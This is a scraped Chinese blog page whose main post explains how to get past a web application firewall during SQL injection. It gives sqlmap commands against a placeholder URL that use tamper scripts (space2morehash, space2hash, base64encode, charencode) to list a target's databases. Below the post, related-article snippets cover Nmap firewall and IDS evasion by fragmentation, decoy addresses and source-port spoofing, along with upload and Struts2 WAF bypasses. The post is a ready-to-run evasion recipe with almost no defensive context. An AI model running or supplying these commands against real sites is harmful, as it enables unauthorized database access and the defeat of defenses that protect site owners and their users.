绕过WAF防火墙

最新推荐文章于 2024-07-26 21:52:37 发布
最新推荐文章于 2024-07-26 21:52:37 发布
阅读量311 收藏
点赞数
分类专栏: SQLMAP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42452926/article/details/104719750
版权

注:此方法适用于在注入的时候出现频繁报错时或者可以确定网站有注入点的时候。

batch:要求不对目标写入
tamper:使用干预脚本

-v 3(3为等级)

注意:若不使用3等级无法继续下一步操作。

常用脚本:space2morehash.py space2hash.py base64encode.py charencode.py

获取当前数据库,使用脚本绕过WAF防火墙
sqlmap.py -u “http://www.xx.com/a.asp?id=123” -v 3 --dbs --batch --tamper “脚本”

示例1:
sqlmap.py -u “http://www.xx.com/a.asp?id=123” -v 3 --dbs --batch --tamper “space2morehash.py”

示例2:
sqlmap.py -u “http://www.xx.com/a.asp?id=123” -v 3 --dbs --batch --tamper “space2hash.py”

示例3:
sqlmap.py -u “http://www.xx.com/a.asp?id=123” -v 3 --dbs --batch --tamper “base64encode.py”

示例4:
sqlmap.py -u “http://www.xx.com/a.asp?id=123” -v 3 --dbs --batch --tamper “charencode.py”

怪獸哪裡跑
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Nmap绕过防火墙
HoYim
04-24 7219
1.碎片化 Nmap发送8个字节的数据包绕过防火墙/IDS/IPS。在防火墙配置不当的时候有用。 nmap -f host MTU,最大传输单元,它是碎片化的别名,我们可以指定它的大小(8的倍数)。 nmap --mtu 16 host 2.诱饵 这种类型的扫描是非常隐蔽且无法察觉。目标由多个假冒或伪造IP地址进行扫描。这样防火墙就会认为攻击或扫描是通过多个资源或IP地址进行,于是就绕...
mysql 注入 绕过防火墙_新型渗透手法:利用XSS绕过WAF进行SQL注入
weixin_39852491的博客
02-18 273
*本文作者:风之传说,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。0×00 前言看到标题,很多人肯定会一脸懵逼,这是什么鬼。利用xss绕过waf进行sql注入?话说,没点意思的文章,我自己也不好意思写出来啊。通俗讲,就是XSS和sql注入相结合绕过waf。知识要能灵活运用嘛。做一个灵活的胖子(虽然我不是胖子)。0×01起因咳咳,还是来说下起因吧!最近遇到一个网站,有防火墙,而且极其变...
绕过WAF防火墙
SSL加密技术
07-09 334
现实中的Web服务,可能潜伏各种Bug漏洞,即便积极的定期进行Web扫描,也不保证万无一失,基于这种原因,应运而生了Web防火墙WAF,最常见的是在基于代理模式的Web网关系统,加入威胁检测功能。 代理模式,原理是将直接发给Web服务器的流量,先发给另一台Web服务器,由这台Web服务器先判断用户请求中的HTTP协议数据,是否存在可疑的危险输入数据,如果发现了恶意攻击行为,可以进行拒绝。如果是正常请求,确认后,将用户的Web请求转发给业务服务器。 代理的服务器先于业务服务器,取得用户的请求数据,可以进行
深入解析:如何使用Nmap绕过防火墙和欺骗IDS规则
最新发布
m0_68483928的博客
07-26 510
在现代网络安全领域,防火墙和入侵检测系统(IDS)是保护网络免受攻击的关键组件。Nmap作为一款强大的网络扫描工具,不仅用于网络探测和安全审计,还能在合法渗透测试中发挥重要作用。本指南将详细介绍如何使用Nmap绕过防火墙和欺骗IDS规则,帮助你提升网络安全研究的深度。
Nmap 绕过防火墙(一)
chibo8600的博客
06-25 2119
1.使用 iptables iptables -L iptables -A [-s 源地址] [-d 目的地地址] -p 协议 [扩展] -j 动作 iptables -D [-s 源地址] [-d 目的地地址] -p 协议 [扩展] -j 动作 iptables -D ...
nmap绕过WAF
weixin_34405354的博客
01-11 1563
1、碎片化Nmap发送8个字节的数据包绕过防火墙/IDS/IPS。这种技术已经很古老了,但是在防火墙配置不当的时候依旧有用。Nmap -f hostMTU,最大传输单元,它是碎片化的别名,我们可以指定它的大小。Nmap --mtu 66 host上面的Nmap扫描使用16字节的数据包而不是8个字节。所以我们可以指定自定义数据包大小为8的倍数。2、诱饵这...
nmap绕过防火墙
iteye_16188的博客
11-15 1726
1. 发现防火墙 1)Nmap -sA 如果结果是filtered,那么应该就是有防火墙 2)nmap --badsum 事实上,所有主机都会丢弃错误checksum的数据包。如果收到响应,那么可能是那些没有检查数据包的防火墙或IPS。 2. 绕过防火墙 1) nmap -ff 2)nmap -f --script=firewall-bypass 3)nmap -D decoy1...
分块绕过WAF.zip
02-27
这是一个绕过WAF的方法,大家能够学习到如何绕过的方法。能够提升自己的技术水品。
struts2绕过waf读写文件及另类方式执行命令1
08-03
首先,我们注意到标题提到的"struts2绕过waf读写文件及另类方式执行命令1",这表明我们将讨论Struts2框架中的一种或多种漏洞,这些漏洞可能导致攻击者能够绕过WAF的保护措施,执行命令或进行文件操作。 在描述中,...
浅谈绕过WAF的数种方法.txt
07-18
### 绕过WAF的方法详解 #### 一、引言 Web应用防火墙WAF)作为保护Web应用程序免受攻击的重要防线,在实际部署中扮演着至关重要的角色。然而,对于安全研究人员和技术爱好者来说,了解如何绕过WAF不仅有助于提高...
上传绕过WAF的15中姿势
06-29
根据提供的标题、描述以及部分上下文内容,我们可以总结并扩展出关于“上传绕过WAF”的15种方法。这是一篇围绕如何绕过Web应用防火墙WAF)进行文件上传的技术文章,旨在帮助安全研究人员和技术人员了解当前绕过...
Nmap绕过防火墙&脚本的使用.docx
09-26
Nmap是用于端口扫描,服务检测,甚至是漏洞扫描等多种功能的强大工具。Nmap从入门到高级覆盖了许多基础的概念和命令,在这篇文章的第二部分,我将提及Nmap一些高级的技术。
nmap 目前绕过防火墙通用策略
Cou1d的博客
07-14 928
ps:常用参数 :nmap -sS -Pn -A target 0x00 前言 现在很多的网络应用都被防火墙保护着,那我们平时在进行扫描的时候,往往一无所获,因此我们在面对防火墙/IDS/IPS的防护应用时,该如何使用nmap 绕过这些防火墙的限制进行端口服务扫描? 0x01 使用nmap 脚本进行防火墙检测 root@kali:~# nmap --script=firewalk --tr...
kali渗透测试——Nmap扫描补充(绕过防火墙
2302_80189643的博客
05-29 842
一些防火墙规则基于端口过滤,可以尝试使用特定的源端口来绕过。使用SYN扫描(也称半开扫描)来减少防火墙检测到的可能性。-T有多个级别,从-T0(最慢)到-T5(最快),选择较低级别可以增加扫描的隐蔽性。通过将数据包分割成更小的部分发送,使得防火墙更难识别这些数据包属于一个扫描流量。方法:nmap --source-port 80 <目标IP地址>-sT 为TCP连接扫描,可能绕过一些只过滤SYN包的防火墙。通过使用多个伪装IP地址,使得防火墙难以确定真实的扫描源。方法:nmap -sS <目标IP地址>
第二轮学习笔记: 扫描工具 -- nmap躲避防火墙
weixin_41489908的博客
04-15 737
如果能在夏天的傍晚时,急匆匆扒掉一碗饭后换上漂亮的连衣裙,随后去见一个喜欢的人。和他一起走在安静的巷子里,或是热闹的夜市里,那时候一定连晚风都是无比温柔的。。。 ---- 网易云热评 一、报文分段,将TCP头分段在几个包中,IDS及其他工具监测更加困难 nmap -f -v 192.168.1.131 二、指定偏移大小,设置TCP/IP协议传输数据报时的最大传输单元,需要注意的是偏移量必须是8...
Nmap备忘单:从探索到漏洞利用(Part 4)
weixin_30726161的博客
04-24 500
这是我们的Nmap备忘单的第四部分(Part 1、Part 2、Part 3)。本文中我们将讨论更多东西关于扫描防火墙,IDS / IPS 逃逸,Web服务器渗透测试等。在此之前,我们应该了解一下防火墙的一些基础知识以便绕过它。 什么是防火墙防火墙是用来控制网络访问的软件或硬件。分为以下两类:1、基于主机的防火墙;2、基于网络的防火墙。 基于主机的防火墙 这是在单台主机...
利用DNS反射绕过防火墙进行通信
NOSEC2019的博客
08-15 2112
域名系统(Domain Name System)几乎和互联网一样古老。它的特殊结构也使它早就成为黑客的利用对象。在这篇短文中,我将详细描述DNS反射的原理,为什么黑客喜欢使用它,以及你为什么要用它。 让我们想象一个网络场景,某道防火墙仅允许内网和Linux软件安装包存储库以及DNS服务器进行通信。这意味着从攻击者的计算机发送的数据包到达不了受害者的服务器,反之亦然。为了突破防御,我们需要“篡改”...
SQL注入绕过WAF策略与技巧解析
当网站部署了Web应用防火墙WAF)来防止这种攻击时,攻击者会寻找各种技巧来绕过WAF的防护措施,从而实施注入攻击。以下是一些常用的SQL注入绕过WAF的方法: 1. **注入类型**: - GET注入:攻击者通常利用URL参数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值